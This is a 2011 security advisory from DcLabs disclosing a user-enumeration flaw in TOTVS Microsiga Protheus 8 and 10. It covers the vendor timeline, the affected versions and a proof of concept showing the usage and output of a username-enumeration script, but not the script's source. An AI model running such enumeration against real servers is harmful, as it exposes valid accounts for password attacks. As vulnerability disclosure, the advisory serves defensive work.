[DCA-2011-0002] [Discussion] - DcLabs Security Research Group advises about following vulnerability(ies): [Software] - TOTVS ERP Microsiga Protheus [Vendor Product Description - Portuguese] - Software de Gestão - TOTVS A TOTVS é uma empresa de software, inovação, relacionamento e suporte à gestão, líder absoluta no Brasil, com 49,1% de share de mercado, e também na América Latina, com 31,2%*, é a maior empresa de softwares aplicativos sediada em países emergentes e a 7ª maior do mundo no setor.Tem mais de 25,2 mil clientes ativos, conta com o apoio de 9 mil participantes e está presente em 23 países. Proposta de Valor Tornar a empresa mais competitiva, com maior velocidade de decisão, oferecendo soluções que organizam, disciplinam, definem e impõem processos, armazenam dados, geram informação e auxiliam a gestão. - Fonte: http://totvs.com.br/web/guest/software [Advisory Timeline] - 02/Feb/2011 -> Initial contact to vendor, security contact request. - 03/Feb/2011 -> Security contact response. - 03/Feb/2011 -> First notification sent, release date set to March 01, 2011. - 04/Feb/2011 -> Vendor confirms notification received. - 21/Feb/2011 -> Situation report requested. - 01/Mar/2011 -> No vendor response. - 02/Mar/2011 -> Advisory published. [Bug Summary] - Users enumeration [Impact] - Low [Affected Version] - Microsiga Protheus 8 (20081215030344) - Microsiga Protheus 10 (20100812040605) - Other versions can also be affected but weren't tested. [Bug Description and Proof of Concept] - The server validates the user before asking for a password, thus we can keep trying usernames until we get a password prompt. - A Proof of Concept has been created: --- command line output begin --- [waKKu@localhost: codes] # ./totvs_users_enumerator.py -h usage: totvs_users_enumerator.py [options] [filename] -h for help options: --version show program's version number and exit -h, --help show this help message and exit -i IPADDRESS, --ipaddress=IPADDRESS Server IP address -p PORT, --port=PORT Port number (defaults to 1234) -t TARGET, --target=TARGET Target Version: 8 -> Protheus 8 | 10 -> Protheus 10. Defaults to 10 [waKKu@localhost: codes] # ./totvs_users_enumerator.py --target 10 --ipaddress 192.168.4.95 userlist Valid user: admin Invalid user: fakeuser Invalid user: nobody Valid user: jonas Valid user: fernando Invalid user: elvis --- command line output end --- ---------------------------------------------------------------------------------------- All flaws described here were discovered and researched by: Flávio do Carmo Júnior aka waKKu. DcLabs Security Research Group carmo.flavio dclabs com br [Workarounds] - An initial workaround was provided to block user after 3 failed password attempts, but it doesn't work against this kind of users enumeration. [Credits] DcLabs Security Research Group. -- -- Atenciosamente, Flávio do Carmo Júnior aka waKKu @ DcLabs Florianópolis/SC http://br.linkedin.com/in/carmoflavio http://0xcd80.wordpress.com